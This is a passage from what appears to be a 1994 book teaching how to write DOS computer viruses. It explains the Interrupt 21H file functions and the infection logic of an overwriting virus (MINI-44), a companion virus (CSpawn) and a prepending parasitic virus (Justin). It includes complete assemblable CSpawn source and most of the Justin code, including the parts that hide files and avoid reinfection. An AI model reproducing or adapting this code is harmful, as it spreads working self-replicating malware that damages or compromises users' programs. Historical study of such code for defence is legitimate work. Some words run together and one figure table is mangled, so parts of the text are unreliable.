Both the FAT and the root directory are located in a fixed area of the disk, reserved especially for them. Subdirectories are stored just like other files with the file attribute set to indicate that this file is a directory. The operating system then handles this subdirectory file in a completely different manner than other files to make it look like a directory, and not just another file. The subdirectory file simply consists of a sequence of 32 byte records describing the files in that directory. It may contain a 32 byte record with the attribute set to directory, which means that the file it refers to is a subdirectory of a subdirectory.
The DOS operating system normally controls all access to files and subdirectories. If one wants to read or write to a file, he does not write a program that locates the correct directory on the disk, reads the file descriptor records to find the right one, figure out where the file is and read it. Instead of doing all of this work, he simply gives DOS the directory and name of the file and asks it to open the file. DOS does all the grunt work. This saves a lot of time in writing and debugging programs. One simply does not have to deal with the intricate details of managing files and interfacing with the hardware.
DOS is told what to do using Interrupt Service Routines (ISR's). Interrupt 21H is the main DOS interrupt service routine that we will use. To call an ISR, one simply sets up the required CPU registers with whatever values the ISR needs to know what to do, and calls the interrupt. For example, the code
mov dx,OFFSET FNAME
xor al,al ;al=0
mov ah,3DH ;DOS function 3D
int 21H ;go do it
opens a file whose name is stored in the memory location FNAME in preparation for reading it into memory. This function tells DOS to locate the file and prepare it for reading. The int 21H instruction transfers control to DOS and lets it do its job. When DOS is finished opening the file, control returns to the statement immediately after the int 21H. The register ah contains the function number, which DOS uses to determine what you are asking it to do. The other registers must be set up differently, depending on what ah is, to convey more information to DOS about what it is supposed to do. In the above example, the ds:dx register pair is used to point to the memory location where the name of the file to open is stored. Setting the register al to zero tells DOS to open the file for reading only.
All of the various DOS functions, including how to set up all the registers, are detailed in many books on the subject. Ralf Brown and Jim Kyle's PC Interrupts is one of the better ones, so if you don't have that information readily available, I suggest you get a copy. Here we will only document the DOS functions we need, as we need them, in Appendix A. This will probably be enough to get by. However, if you are going to study viruses on your own, it is definitely worthwhile knowing about all of the various functions available, as well as the finer details of how they work and what to watch out for.
To search for other files to infect, the MINI-44 virus uses the DOS search functions. The people who wrote DOS knew that many programs (not just viruses) require the ability to look for files and operate on them if any of the required type are found. Thus, they incorporated a pair of searching functions into the Interrupt 21H handler, called Search First and Search Next. These are some of the more complicated DOS functions, so they require the user to do a fair amount of preparatory work before he calls them. The first step is to set up an ASCIIZ string in memory to specify the directory to search, and what files to search for. This is simply an array of bytes terminated by a null byte (0). DOS can search and report on either all the files in a directory or a subset of files which the user can specify by file attribute and by specifying a file name using the wildcard characters "?" and "*", which you should be familiar with from executing commands like copy *.* a: and dir a???_100.* from the command line in DOS. (If not, a basic book on DOS will explain this syntax.) For example, the ASCIIZ string
DB '\system\hyper.*',0
will set up the search function to search for all files with the name hyper, and any possible extent, in the subdirectory named system. DOS might find files like hyper.c, hyper.prn, hyper.exe, etc. If you don't specify a path in this string, but just a file name, e.g. "*.COM" then DOS will search the current directory.
After setting up this ASCIIZ string, one must set the registers ds and dx up to point to the segment and offset of this ASCIIZ string in memory. Register cl must be set to a file attribute mask which will tell DOS which file attributes to allow in the search, and which to exclude. The logic behind this attribute mask is somewhat complex, so you might want to study it in detail in Appendix A. Finally, to call the Search First function, one must set ah = 4E Hex.
If the search first function is successful, it returns with register al = 0, and it formats 43 bytes of data in the Disk Transfer Area, or DTA. This data provides the program doing the search with the name of the file which DOS just found, its attribute, its size and its date of creation. Some of the data reported in the DTA is also used by DOS for performing the Search Next function. If the search cannot find a matching file, DOS returns al non-zero, with no data in the DTA. Since the calling program knows the address of the DTA, it can go examine that area for the file information after DOS has stored it there. When any program starts up, the DTA is by default located at offset 80H in the Program Segment Prefix. A program can subsequently move the DTA anywhere it likes by asking DOS, as we will discuss later. For now, though, the default DTA will work for MINI-44 just fine.
To see how the search function works more clearly, let us consider an example. Suppose we want to find all the files in the currently logged directory with an extent "COM", including hidden and system files. The assembly language code to do the Search First would look like this (assuming ds is already set up correctly, as it is for a COM file):
SRCH_FIRST:
mov dx,OFFSET COMFILE ;set offset of asciiz string
mov ah,4EH ;search first function
int 21H ;call DOS
jc NOFILE ;go handle no file found condition
FOUND: ;come here if file found
COMFILEDB '*.COM',0
If this routine executed successfully, the DTA might look like this:
03 3F 3F 3F 3F 3F 3F 3F-3F 43 4F 4D 06 18 00 00 .????????COM.... 00 00 00 00 00 00 16 98-30 13 BC 62 00 00 43 4F ........0..b..CO 4D 4D 41 4E 44 2E 43 4F-4D 00 00 00 00 00 00 00 MMAND.COM.......
when the program reaches the label FOUND. In this case the search found the file COMMAND.COM.
In comparison with the Search First function, the Search Next is easy, because all of the data has already been set up by the Search First. Just set ah = 4F hex and call DOS interrupt 21H:
mov ah,4FH ;search next function
int 21H ;call DOS
jc NOFILE ;no, go handle no file found
FOUND2: ;else process the file
If another file is found the data in the DTA will be updated with the new file name, and ah will be set to zero on return. If no more matches are found, DOS will set ah to something besides zero on return. One mustbecareful here so thedataintheDTAisnotaltered between the call to Search First and later calls to Search Next, because the Search Next expects the data from the last search call to be there.
The MINI-44 virus puts the DOS Search First and Search Next functions together to find every COM program in a directory, using the simple logic of Figure 3.5.
The obvious result is that MINI-44 will infect every COM file in the directory you're in as soon as you execute it. Simple enough.
Fig 3.5: MINI-44 file search logic.
MINI-44's replication mechanism is even simpler than its search mechanism. To replicate, it simply opens the host program in write mode - just like an ordinary program would open a data file - and then it writes a copy of itself to that file, and closes it. Opening and closing are essential parts of writing a file in DOS. The act of opening a file is like getting permission from DOS to touch that file. When DOS returns the OK to your program, it is telling you that it does indeed have the resources to access that file, that the file exists in the form you expect, etc. Closing the file tells DOS to finish up work on the file and flush all data changes from DOS' memory buffers and put it on the disk.
To open the host program, MINI-44 uses DOS Interrupt 21H Function 3D Hex. The access rights in the al register are specified as 1 for write-only access (since the virus doesn't need to inspect the program it is infecting). The ds:dx pair must point to the file name, which has already been set up in the DTA by the search functions at FNAME = 9EH.
The code to open the file is thus given by:
mov ax,3D01H
mov dx,OFFSET FNAME
int 21H
If DOS is successful in opening the file, it will return a file handle in the ax register. This file handle is simply a 16-bit number that uniquely references the file just opened. Since all other DOS file manipulation calls require this file handle to be passed to them in the bx register, MINI-44 puts it there as soon as the file is opened with a mov bx,ax instruction.
Next, the virus writes a copy of itself into the host program file using Interrupt 21H, Function 40H. To do this, ds:dx must be set up to point to the data to be written to the file, which is the virus itself, located at ds:100H. (ds was already set up properly when the COM program was loaded by DOS.) At this point, the virus which is presently executing is treating itself just like any ordinary data to be written to a file - and there's no reason it can't do that. Next, to call function 40H, cx should be set up with the number of bytes to be written to the disk, in this case 44, dx should point to the data to be written (the virus), and bx should contain the file handle:
mov bx,ax ;put file handle in bx
mov dx,100H ;location to write from
mov cx,44 ;bytes to write
mov ah,40H
int 21H ;do it
Finally, to close the host file, MINI-44 simply uses DOS function 3EH, with the file handle in bx once again. Figure 3.6 depicts the end result of such an infection.
| Uninfected | Infected |
|---|---|
Original COM File Code Original COM File Code Original COM File Code Original COM File Code Original COM File Code Original COM File Code | Original COM File Code Original COM File Code Original COM File Code Original COM File Code Original COM File Code MINI-44 Virus Code |
Fig. 3.6: Uninfected and infected COM files.
MINI-44 is an incredibly simple virus as far as viruses go. If you're a novice at assembly language, it's probably just enough to cut your teeth on without being overwhelmed. If you're a veteran assembly language programmer who hasn't thought too much about viruses, you've just learned how ridiculously easy it is to write a virus.
Of course, MINI-44 isn't a very good virus. Since it destroys everything it touches, all you have to do is run one program to know you're infected. And the only thing to do once you're infected is to deleteall theinfectedfiles andreplace themfromabackup.Inshort, this isn't the kind of virus that stands a chance of escaping into the wild and showing up on computers where it doesn't belong without any help.
In general, overwriting viruses aren't very good at establishing a population in the wild because they are so easy to spot, and because they're blatantly destructive and disagreeable. The only way an overwriting virus has a chance at surviving on a computer for more than a short period of time is to employ a sophisticated search mechanism so that when you execute it, it jumps to some far off program in another directory where you can't find it. And if you can't find it, you can't clean it up. There are indeed overwriting viruses which use this strategy. Of course, even this strategy is of little use once your scanner can detect it, and if you're going to make the virus hard to scan, you may as well make a better virus while you're at it.
Companion viruses are the next step up in complexity after overwriting viruses. They are the simplest non-destructive type of virus in the IBM PC environment.
A companion virus is a program which fools the computer operator by renaming programs on a disk to non-standard names, and then replacing the standard program names with itself. Figure 4.1 shows how a companion virus infects a directory. In Figure 4.1a, you can see the directory with the uninfected host, HOST1.COM. In Figure 4.1b you see the directory after an infection. HOST1.COM has been renamed HOST1.CON, and the virus lives in the hidden file HOST1.COM. If you type "HOST1" at the DOS prompt, the virus executes first, and passes control to the host, HOST1.CON, when it is ready.
Let's look into the non-resident companion virus called CSpawn to see just how such a virus goes about its business...
There are two very important things a companion virus must accomplish: It must be capable of spreading or infecting other files, and it must be able to transfer control to a host program which is what the user thought he was executing when he typed a program name at the command prompt.
Directory of C:\VIRTEST Name Ext Size #Clu Date Time Attributes HOST1 COM 210 1 4/19/94 9:13p Normal,Archive HOST5 COM 1984 1 4/19/94 9:13p Normal,Archive HOST6 COM 501 1 4/19/94 9:13p Normal,Archive HOST7 COM 4306 1 4/19/94 9:13p Normal,Archive
Fig. 4.1a: Directory with uninfected HOST1.COM.
Directory of C:\VIRUTEST Virus
|
Name Ext Size #Clu Date Time Attributes |
HOST1 COM 180 1 10/31/94 9:54a Hidden,Archive <--+
HOST5 COM 180 1 10/31/94 9:54a Hidden,Archive <--+
HOST1 CON 210 1 4/19/94 9:13p Normal,Archive |
HOST6 COM 180 1 10/31/94 9:54a Hidden,Archive <--+
HOST7 COM 180 1 10/31/94 9:54a Hidden,Archive <--+
HOST5 CON 1984 1 4/19/94 9:13p Normal,Archive
HOST6 CON 501 1 4/19/94 9:13p Normal,Archive
HOST7 CON 4306 1 4/19/94 9:13p Normal,Archive
Fig. 4.1b: Directory with infected HOST1.COM.
Before CSpawn infects other programs, it executes the host program which it has attached itself to. This host program exists as a separate file on disk, and the copy of the CSpawn virus which has attached itself to this host has a copy of its (new) name stored in it.
Before executing the host, CSpawn must reduce the amount of memory it takes for itself. First the stack must be moved. In a COM program the stack is always initialized to be at the top of the code segment, which means the program takes up 64 kilobytes of memory, even if it's only a few hundred bytes long. For all intents and purposes, CSpawn only needs a few hundred bytes for stack, so it is safe to move it down to just above the end of the code. This is accomplished by changing sp,
mov sp,OFFSET FINISH + 100H
Next, CSpawn must tell DOS to release the unneeded memory with Interrupt 21H, Function 4AH, putting the number of paragraphs (16 byte blocks) of memory to keep in the bx register:
mov ah,4AH
mov bx,(OFFSET FINISH)/16 + 11H
int 21H
Once memory is released, the virus is free to execute the host using the DOS Interrupt 21H, Function 4BH EXEC command. To call this function properly, ds:dx must be set up to point to the name of the file to execute (stored in the virus in the variable SPAWN_NAME), and es:bx must point to a block of parameters to tell DOS where variables like the command line and the environment string are located. This parameter block is illustrated in Figure 4.2, along with detailed descriptions of what all the fields in it mean. Finally, the al register should be set to zero to tell DOS to load and execute the program. (Other values let DOS just load, but not execute, etc. See Appendix A.) The code to do all this is pretty simple:
mov dx,OFFSET SPAWN_NAME
mov bx,OFFSET PARAM_BLK
mov ax,4B00H
int 21H
There! DOS loads and executes the host without any further fuss, returning control to the virus when it's done. Of course, in the process of executing, the host will mash most of the registers, including the stack and segment registers, so the virus must clean things up a bit before it does anything else.
| Offset | Size(bytes) | Description |
|---|---|---|
| 0 | 2 | Segment of environment string. This is usually stored at offset 2CH in the PSP of the calling program, though the program calling EXEC can change it. |
| 2 | 4 | Pointer to command line (typically at offset 80H in the PSP of the calling program, PSP:80H) |
| 6 | 4 | Pointer to first default FCB (typically at offset 5CH in the PSP, PSP:5CH) |
| 10 | 4 | Pointer to second FCB (typically at offset 6CH in the PSP, PSP:6CH) |
| 14 | 4 | Initial ss:sp of loaded program (sub- function 1 and 3, returned by DOS) |
| 18 | 4 | Initial cs:ip of loaded program (sub- function 1 and 3, returned by DOS) |
Fig 4.2: EXEC function control block.
Our companion virus searches for files to infect in the same way MINI-44 does, using the DOS Search First and Search Next functions, Interrupt 21H, Functions 4EH and 4FH. CSpawn is designed to infect every COM program file it can find in the current directory as soon as it is executed. The search process itself follows the same logic as MINI-44 in Figure 3.5.
The search routine looks like this now:
mov dx,OFFSET COM_MASK
mov ah,4EH ;search first
xor cx,cx ;normal files only
SLOOP: int 21H ;do search
jc SDONE ;none found, exit
call INFECT_FILE ;one found, infect it
mov ah,4FH ;search next fctn
jmp SLOOP ;do it again
SDONE:
Notice that we have a call to a separate infection procedure now, since the infection process is more complex.
There is one further step which CSpawn must take to work properly. The DOS search functions use 43 bytes in the Disk Transfer Area (DTA) as discussed in the last chapter. Where is this DTA though?
When DOS starts a program, it sets the DTA up at ds:0080H, but the program can move it when it executes by using the DOS Interrupt 21H Function 1AH. Because the host program has already executed, DOS has moved the DTA to the host's data segment, and the host may have moved it somewhereelseontopofthat.Sobefore performing a search, CSpawn must restore the DTA. This is easily accomplished with Function 1AH, setting ds:dx to the address where you'd like the DTA to be. The default location ds:0080H will do just fine here:
mov ah,1AH
mov dx,80H
int 21H
Note that if CSpawn had done its searching and infecting before the host was executed, it would not be a wise idea to leave the DTA at offset 80H. That's because the command line parameters are stored in the same location, and the search would wipe those parameters out. For example, if you had a disk copying program called MCOPY, which was invoked with a command like this:
C:\>MCOPY A: B:
to indicate copying from A: to B:, the search would wipe out the "A: B:" and leave MCOPY clueless as to where to copy from and to. In such a situation, another area of memory would have to be reserved, and the DTA would have to be moved to that location from the default value. All one would have to do in this situation would be to define
DTA DB 43 dup (?)
and then set it up with
mov ah,1AH mov dx,OFFSET DTA int 21H
Note that it was perfectly all right for MINI-44 to use the default DTA because it destroyed the program it infected. As such it mattered but little that the parameters passed to the program were also destroyed. Not so for a virus that doesn't destroy the host.
Once CSpawn has found a file to infect, the process of infection is fairly simple. To infect a program, CSpawn
In this way, the next time the name of the host is typed on the command line, the virus will be executed instead.
To rename the host, the virus copies its name from the DTA, where the search routine put it, to a buffer called SPAWN_NAME. Then CSpawn changes the name in this buffer by changing the last letter to an "N". Next, CSpawn calls the DOS Rename function, Interrupt 21H, Function 56H. To use this function, ds:dx must point to the original name (in the DTA) and es:di must point to the new name (in SPAWN_NAME):
mov dx,9EH ;DTA + 1EH, original name
mov di,OFFSET SPAWN_NAME
mov ah,56H
int 21H
Finally, the virus creates a file with the original name of the host,
mov ah,3CH ;DOS file create function
mov cx,3 ;hidden, read only attributes
mov dx,9EH ;DTA + 1EH, original name
int 21H
and writes a copy of itself to this file
mov ah,40H ;DOS file write fctn
mov cx,FINISH-CSpawn ;size of virus
mov dx,100H ;location of virus
int 21H
Notice that when CSpawn creates the file, it sets the hidden attribute on the file. There are two reasons to do that. First, it makes disinfecting CSpawn harder. You won't see the viral files when you do a directory and you can't just delete them - you'll need a special utility like PC Tools or Norton Utilities. Secondly, it keeps CSpawn from infecting itself. Suppose CSpawn had infected the program FORMAT. Then there would be two files on disk, FORMAT.CON, the original, and FORMAT.COM, the virus. But the next time the virus executes, what is to prevent it from finding FORMAT.COM and at least trying to infect it again? If FORMAT.COM is hidden, the virus' own search mechanism will skip it since we did not ask it to search for hidden files. Thus, hiding the file prevents reinfection.
There are a wide variety of strategies possible in writing companion viruses, and most of them have been explored by virus writers in one form or another. The CSpawn virus works like a virus generated by the Virus Creation Lab (VCL), a popular underground program which uses a pull-down menu system to automatically generate viruses. CSpawn lacks only some of the unnecessary and confusing code generated by the VCL. Yet there are many other possibilities...
Some of the first companion viruses worked on the principle that when a user enters a program name at the command prompt, DOS always searches for a COM program first and then an EXE. Thus, a companion virus can search for EXE program files and simply create a COM file with the same name, only hidden, in the same directory. Then, whenever a user types a name, say FDISK, the FDISK.COM virus program will be run by DOS. It will replicate and execute the host FDISK.EXE. This strategy makes for an even simpler virus than CSpawn.
Yet there need not be any relationship between the name of the virus executable and the host it executes. In fact, DOS Interrupt 21H, Function 5AH will create a file with a completely random name. The host can be renamed to that, hidden, and the virus can assume the host's original name. Since the DOS File Rename function can actually change the directory of the host while renaming it, the virus could also collect up all the hosts in one directory, say \WINDOWS\TMP, where a lot of random file names would be expected. (And pity the poor user who decides to delete all those "temporary" files.)
Neither must one use the DOS EXEC function to load a file. One could, for example, use DOS Function 26H to create a program segment, and then load the program with a file read.
Finally, one should note that a companion virus written as a COM file can easily attack EXE files too. If the virus is written as a COM file, then even if it creates a copy of itself named EXE, DOS will interpret that EXE as a COM file and execute it properly. The virus itself can EXEC an EXE host file just as easily as a COM file because the DOS EXEC function does all the dirty work of interpreting the different formats.
The major problem a companion virus that infects EXEs will run into is Windows executables, which it must stay away from. It will cause Windows all kinds of problems if it does not. We will discuss Windows executables more thoroughly in a few chapters when we begin looking at EXE files in depth.
The following virus can be assembled into a COM file by MASM, TASM or A86 and executed directly.
;The CSpawn virus is a simple companion virus to illustrate how a companion
;virus works.
;
;(C) 1994 American Eagle Publications, Inc. All Rights Reserved!
.model tiny
.code
org 0100h
CSpawn:
mov sp, OFFSET FINISH + 100H ;Change top of stack
mov ah, 4AH ;DOS resize memory fctn
mov bx, sp
mov cl, 4
shr bx, cl
inc bx ;BX=# of para to keep
int 21H
mov bx, 2CH ;set up EXEC param block
mov ax, [bx]
mov WORD PTR [PARAM_BLK], ax ;environment segment
mov ax, cs
mov WORD PTR [PARAM_BLK+4], ax ;@ of parameter string
mov WORD PTR [PARAM_BLK+8], ax ;@ of FCB1
mov WORD PTR [PARAM_BLK+12], ax ;@ of FCB2
mov dx, OFFSET REAL_NAME ;prep to EXEC
mov bx,OFFSET PARAM_BLK
mov ax,4B00H
int 21H ;execute host
cli
mov bx,ax ;save return code here
mov ax,cs ;AX holds code segment
mov ss,ax ;restore stack first
mov sp,(FINISH - CSpawn) + 200H
sti
push bx
mov ds,ax ;Restore data segment
mov es,ax ;Restore extra segment
mov ah,1AH ;DOS set DTA function
mov dx,80H ;put DTA at offset 80H
int 21H
call FIND_FILES ;Find and infect files
pop ax ;AL holds return value
mov ah,4CH ;DOS terminate function
int 21H ;bye-bye
;The following routine searches for COM files and infects them
FIND_FILES:
mov dx,OFFSET COM_MASK ;search for COM files
mov ah,4EH ;DOS find first file function
xor cx,cx ;CX holds all file attributes
FIND_LOOP: int 21H
jc FIND_DONE ;Exit if no files found
call INFECT_FILE ;Infect the file!
mov ah,4FH ;DOS find next file function
jmp FIND_LOOP ;Try finding another file
FIND_DONE: ret ;Return to caller
COM_MASK db '*.COM',0 ;COM file search mask
;This routine infects the file specified in the DTA.
INFECT_FILE:
mov si,9EH ;DTA + 1EH
mov di,OFFSET REAL_NAME ;DI points to new name
INF_LOOP: lodsb ;Load a character
stosb ;and save it in buffer
or al,al ;Is it a NULL?
jnz INF_LOOP ;If so then leave the loop
mov WORD PTR [di-2],'N' ;change name to CON & add 0
mov dx,9EH ;DTA + 1EH
mov di,OFFSET REAL_NAME
mov ah,56H ;rename original file
int 21H
jc INF_EXIT ;if can't rename, already done
mov ah,3CH ;DOS create file function
mov cx,2 ;set hidden attribute
int 21H
mov bx,ax ;BX holds file handle
mov ah,40H ;DOS write to file function
mov cx,FINISH - CSpawn ;CX holds virus length
mov dx,OFFSET CSpawn ;DX points to CSpawn of virus
int 21H
mov ah,3EH ;DOS close file function
int 21H
INF_EXIT: ret
REAL_NAME db 13 dup (?) ;Name of host to execute
;DOS EXEC function parameter block
PARAM_BLK DW ? ;environment segment
DD 80H ;@ of command line
DD 5CH ;@ of first FCB
DD 6CH ;@ of second FCB
FINISH:
end CSpawn
The next five exercises will lead the reader through the necessary steps to create a beneficial companion virus which secures all the programs in a directory with a password without which they cannot be executed. While this virus doesn't provide world-class security, it will keep the average user from nosing around where he doesn't belong.
Now we are ready to discuss COM infecting viruses that actually attach themselves to an existing COM file in a non-destructive manner. This type of virus, known as a parasitic virus, has the advantage that it does not destroy the program it attacks, and it does not leave tell-tale signs like all kinds of new hidden files and renamed files. Instead, it simply inserts itself into the existing program file of its chosen host. The only thing you'll notice when a program gets infected is that the host file has grown a bit, and it has a new date stamp.
There are two different methods of writing a parasitic COM infector. One approach is to put the virus at the beginning of the host, and the other is to put the virus at the end of the host. Each strategy has its advantages and its difficulties, so we'll discuss both. This chapter will detail the first approach: a virus that places itself at the beginning of the host.
At the same time, we're going to begin a discussion of what is necessary to write a virus that doesn't cause problems. We've already seen that some viruses - like overwriting viruses - are inherently destructive. For these viruses, the very act of infecting a program ruins it. Parasitic viruses need not be destructive, but they can be if the programmer isn't careful. Unlike companion viruses, which rely heavily on DOS to take care of the details of executing the host, a parasitic virus has to be careful not to mistreat the host program if it's going to work properly when the virus gives it control.
Often virus authors aren't careful about the details which must be covered if a virus is to avoid causing inadvertent damage. Thus, they write "benign" viruses which may not be so benign. Such programming mistakes are often a good way to notice a virus before it wants to be noticed, simply because the problems are a clue to viral activity - if you're aware of what the problems are.
This chapter's virus is a parasitic virus which inserts itself at the beginning of a COM program file. Its name is Justin. Like CSpawn, Justin infects only COM files in the current directory. As such, it is fairly safe to experiment with.
Figure 5.1 depicts the action of Justin on a disk file. Essentially, the virus just moves the host program up and puts itself in front of it. This is accomplished fairly easily with DOS, using the file read and write functions. Before the virus does that, however, it must perform a few checks to make sure it won't louse things up when infecting a program.
Fig. 5.1: Action of JUSTIN on a COM file.
First and most important, Justin must have enough memory to execute properly. It will read the entire host into memory and then write it back out to the same file at a different offset. In general, a COM program can be almost 64 kilobytes long (not quite), so a buffer of 64K must be available in the computer's memory. If it is not, the virus cannot operate, and it should simply go to sleep. Justin contains a routine CHECK_MEM which makes this determination. If enough memory is available, CHECK_MEM returns with the carry flag reset and es set up with the segment of a 64K block of memory it can use. If there is not enough memory, CHECK_MEM returns with carry set. The main control routine of the virus looks like this:
JUSTIN:
call CHECK_MEM ;enough memory?
jc GOTO_HOST_LOW ;nope, pass ctrl to host
call JUMP_HIGH ;jump to high memory segment
call FIND_FILE ;else find a host
jc GOTO_HOST_HIGH ;none, pass ctrl to host
call INFECT_FILE ;yes, infect it
GOTO_HOST_HIGH: ;jmp to host from new mem blk
GOTO_HOST_LOW: ;jmp to host from orig mem blk
so you can see that if there isn't enough memory for the virus to operate, it does nothing but let the host execute normally.
Now, typically, when a COM program is loaded it is given all available system memory. Thus, any memory above the PSP that belongs to DOS will be available for the virus to use. The virus must,however, keep itshands offtheentire64kilobyteblockwhich starts with the PSP. The virus itself lives at offset 100H in this segment and is followed directly by the host it was originally attached to. Then at the very end of this segment is the COM program'sstack.Ifthe virusmesses withany of thesethingsitcould cause problems. So what the virus wants to do is use the 64 kilobyte block just above where it lives - if that block is available to use.
There are a number of things which could cause this block of memory to be unavailable. For example, there may not be much memory in the computer. If it only has 256 kilobytes installed, that memory just may not exist. Likewise, most of the memory may be in use. For example, if you're using a communications programthat allows you to shell to DOS during a data transfer, there may not be a whole lot of DOS memory available, even if you do have 640K of conventional memory.
One could simply physically check memory to avoid these problems - write a byte to the desired location and see if it's there when you read it back. This, however, neglects a more subtle problem. There could be something running just below the 640K limit. For example, the beneficial virus KOH (discussed later in this book) operates at the very top of conventional memory. Overwrite it and your computer will grind to a halt. For this reason, there is only one sensible way to check whether enough memory is available: use DOS' own memory management functions.
One can modify the amount of memory allocated to a program with DOS Interrupt 21H, Function 4AH. One simply puts the desired number of paragraphs of memory (16 byte blocks) in bx and calls this function. If unsuccessful, DOS will set the carry flag and put the number of blocks actually available in bx. Since we need 2*64K bytes of memory, we simply attempt to allocate memory:
mov ah,4AH
mov bx,2000H ;2000H*16 = 2*64K
int 21H
If this function returns successfully, enough memory is available. If not, there's not enough memory. Of course, if this function is successful, we've deallocated memory, and the host program may not like that. It may be expecting to have free reign over all the memory available. Thus, Justin must re-allocate all available memory if it's to be a nice virus. But how much is available? We still don't know. To find out, we just attempt to allocate too much - say a full megabyte (bx=0FFFFH). That's guaranteed to fail, but it will also return the amount available in bx. Then we just call Function 4A again with the proper value. So the CHECK_MEM routine looks like this:
CHECK_MEM:
mov ah,4AH ;modify allocated memory
mov bx,2000H ;we want 2*64K
int 21H ;set c if not enough memory
pushf
mov ah,4AH ;re-allocate all available mem
mov bx,0FFFFH
int 21H
mov ah,4AH ;bx now has actual amt avail
int 21H
popf
ret ;and return to caller
Now, if enough memory is available, Justin springs into action. The first thing it does is jump to the high block of memory 64K above where it starts executing. This is accomplished by the routine JUMP_HIGH. First, JUMP_HIGH puts a copy of the virus in this new segment. To do that, it uses the instruction rep movsb, which moves cx bytes from ds:si to es:di. In memory, the virus starts at ds:100H right now, and its length is given by OFFSET HOST - 100H, where OFFSET HOST is the address where the host program starts, a byte after the end of the virus. Thus, moving the virus up is accomplished by
mov si,100H
mov di,OFFSET HOST
mov cx,OFFSET HOST - 100H
rep movsb
Next, Justin moves the Disk Transfer Area up to this new segment at offset 80H using DOS Function 1AH. That preserves the command line, as discussed in the last chapter. Finally, JUMP_HIGH passes control to the copy of Justin in the high segment. (See Figure 5.2) To do this, it gets the offset of the return address for JUMP_HIGH off the stack. When JUMP_HIGH was called by the main control routine, the call instruction put the address right after it on the stack (in this case, the value 108H).
When a normal near return is executed, this address is popped off the stack into the instruction pointer register ip which tells what instruction to execute next. To get to the high segment, we capture the return offset by popping it off the stack, then we put the high segment on the stack, and then put the offset back. Finally, JUMP_HIGH returns using a far return instruction, retf. That loads cs:ip with the 4-byte address on the stack, transferring control to a new segment - in our case the high segment where the copy of Justin is sitting, waiting to execute.
Fig. 5.2: Jumping to the high segment
Once operating in the high segment, Justin can start the infection process. The file search routine is very similar to the routine used in the viruses we've already discussed. It uses the DOS Search First/Search Next functions to locate files with an extent "COM". This search routine differs in that it calls another routine, FILE_OK, internally (see Figure 5.3). FILE_OK is designed to avoid problems endemic to parasitic viruses. The biggest problem is how to avoid multiple infection.
As you will recall, the MINI-44 virus was very rude and overwrote every COM file it found. Multiple infections didn't matter because a file overwritten once by the virus looks exactly the same as one overwritten ten times. The SPAWNR virus avoided multiple infections by hiding the companion COM file. A parasitic virus has a more difficult job, though. If it infects a COM file again and again, the file will grow larger and larger. If it gets too big, it will no longer work. Yet how does the parasitic virus know it has already infected a file?
Fig. 5.3: JUSTINs file search and infect.
FILE_OK takes care of the details of determining whether a potential host should be infected or not. First, FILE_OK opens the file passed to it by FIND_FILE and determines its length. If the file is too big, adding the virus to it could make it crash, so Justin avoids such big files. But how big is too big? Too big is when Justin can't get into the high memory segment without ploughing the stack into the top of the host. Although Justin doesn't use too much stack, one must remember that hardware interrupts can use the stack at any time. Thus, about 100H bytes for a stack will be needed. So, we want
(Size of Justin) + (Size of Host) + (Size of PSP) < 0FF00H
to be safe. To determine this, FILE_OK opens the potential host using DOS function 3DH, attempting to open in read/write mode. We already met this function with MINI-44. Now we just use it in read/write mode:
mov dx,9EH ;address of file name in DTA
mov ax,3D02H ;open read/write mode
int 21H
If this open fails, then the file is probably read only, and Justin avoids it.
Next FILE_OK must find out how big the file is. One can pull this directly from the DTA, at offset 1AH. However, there is another way to find out how big a file is, even when you're not using the DOS search functions, and that is what Justin uses here. This method introduces an important concept: the file pointer.
FILE_OK moves the file pointer to the end of the file to find out how big it is. The file pointer is a four byte integer stored internally by DOS which keeps track of where DOS will read and write from in the file. This file pointer starts out pointing to the first byte in a newly-opened file, and it is automatically advanced by DOS as the file is read from or written to.
DOS Function 42H is used to move the file pointer to any desired value. In calling function 42H, the register bx must be set up with the file handle number, and cx:dx must contain a 32 bit long integer telling where to move the file pointer to. There are three different ways this function can be used, as specified by the contents of the al register. If al=0, the file pointer is set relative to the beginning of the file. If al=1, it is incremented relative to the current location, and if al=2, cx:dx is used as the offset from the end of the file. When Function 42H returns, it also reports the current value of the file pointer (relative to the beginning of the file) in the dx:ax register pair. So to find the size of a file, one sets the file pointer to the end of the file
mov ax,4202H ;seek relative to end
xor cx,cx ;cx:dx=0
xor dx,dx ;the offset from the end
int 21H
and the value returned in dx:ax will be the file size! FILE_OK must check this number to make sure it's not too big. If dx=0, the file is more than 64K long, and therefore too big:
or dx,dx ;is dx = 0?
jnz FOK_EXIT_C ;no, exit with c set
Likewise, if we add OFFSET HOST to ax, and it's greater than 0FF00H, the file is too big:
add ax,OFFSET HOST ;add size of virus + PSP
cmp ax,0FF00H ;is it too big?
ja FOK_EXIT_C ;yes, exit with c set
If FILE_OK gets this far, the new host isn't too big, so the next step is to read the entire file into memory to examine its contents. It is loaded right after the virus in the high segment. That way, if the file is good to infect, the virus will have just created an image of the infected program in memory (See Fig. 5.4) Actually infecting it will be very simple. All Justin will have to do is write that image back to disk!
Fig. 5.4: JUSTIN creates an image of infected host.
To read thefileintomemory,wemust first movethefilepointer back to the beginning of the file with DOS Function 42H, Subfunction 0,
mov ax,4200H ;move file ptr
xor cx,cx ;0:0 relative from start
xor dx,dx
int 21H
Next, DOS Function 3FH reads the file into memory. To read a file, one must set bx equal to the file handle number and cxto the number of bytes to read from the file. Also ds:dx must be set to the location in memory where the data read from the file should be stored (the label HOST).
pop cx ;cx contains host size
push cx ;save it for later use
mov ah,3FH ;prepare to read file
mov dx,OFFSET HOST ;into host location
int 21H ;do it
Before infectingthe new host,Justinperformstwomorechecks in the FILE_OK routine. The first is simply to see if the potential host has already been infected. To do that, FILE_OK simply compares the first 20 bytes of the host with its own first 20 bytes. If they are the same, the file is already infected. This check is as simple as
mov si,100H
mov di,OFFSET HOST
mov cx,10
repz cmpsw
If the z flag is set at the end of executing this, then the virus is already there.
One final check is necessary. Starting with DOS 6.0, a COM program may not really be a COM program. DOS checks the program to see if it has a valid EXE header, even if it is named "COM", and if it has an EXE header, DOS loads it as an EXE file. This unusual circumstance can cause problems if a parasitic virus doesn't recognize the same files as EXE's and steer clear of them. If a parasitic COM infector attacked a file with an EXE structure, DOS would no longer recognize it as an EXE program, so DOS would load it as a COM program. The virus would execute properly, but then it would attempt to transfer control to an EXE header (which is just a data structure) rather than a valid binary program. That would probably result in a system hang.
One might think programs with this bizarre quirk are fairly rare, and not worth the trouble to steer clear of them. Such is not the case. Some COMMAND.COMs take this form - one file a nice virus certainly doesn't want to trash.
